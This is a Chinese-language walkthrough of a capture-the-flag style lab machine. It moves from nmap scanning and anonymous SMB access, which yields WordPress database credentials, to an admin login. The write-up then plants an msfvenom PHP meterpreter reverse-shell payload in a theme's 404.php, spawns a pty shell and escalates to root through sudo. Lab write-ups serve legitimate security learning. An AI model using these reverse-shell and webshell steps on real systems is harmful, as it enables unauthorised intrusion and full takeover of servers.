1、首先局域网扫描靶机的iP

2、使用nmap扫描靶机的IP看看开放的端口详细信息

3、扫描信息及版本以及目录扫描

4、查看扫描目录和文件

我们进行访问80端口

发现并没有什么作用，因此我们根据扫描的敏感信息进行查看

在robots.txt中发现有4个目录

我们可以找到数据库后台登录页面和登录页面

我进行了用户枚举但没有找到

但是我们可以尝试一下admin这个用户，接下来就是用户密码

我们使用爆破密码也不行因此而提示我们，没有开启WordPress

5、了解smb协议

 139 ，445(TCP) - 文件和打印共享 一般来说我们都是通过139或445端口来进行文件共享，而这种文件共享的协议统称为smb协议。

然后我们使用kail对smb协议进行弱点分析并进行利用。

使用命令：smbclient

直接使用空密码enter进入就可以

接着我们分别进入三个变量中，并观察有什么文件信息

查看三个变量后，我们发现share$变量中发现有目录wordpress和deets.txt

下载deets.txt

进入wordpress目录中，发现有一个wp-config.php

发现wp-config.php文件这个有用

 注：wp-config.php文件是wordpress建站的配置文件，里面有wordpress的数据库信息，语言信息。

下载wp-config.php

6、查看下载的文件

密码：12345，先记下

发现了数据库后台登录的用户和密码

Admin：TogieMYSQL12345^^

7、进行登录尝试

Admin：TogieMYSQL12345^^，可以登进页面

我们发现有一个可以编辑的404.php

接下来我们就可以使用msfconsole生成一个php的监听脚本

msfvenom -p php/meterpreter/reverse_tcp lhost=kaliip lport=kali监听端口 -f raw 

查看监听的脚本后，把/*去掉把后面的代码修改在404.php上进行保存

然后访问
 

http://192.168.31.210/wordpress/wp-content/themes/twentyseventeen/404.php

8、进入shell终端并进行优化

建立交互式环境

python -c 'import pty;pty.spawn("/bin/bash")'

9、提权

首先查看是否含有suid提权

发现没有可以提权的存在

我也去尝试sudo来进行提权，还是没有可以提权的点，因此我们再查看/etc/passwd，看看有没有特殊用户

使用之前记录的密码

然后再使用suid提权

发现现在是rbash权限，并且无法提权

我们再尝试sudo提权看看

发现togie拥有sudo所有权限

所以sudo su - root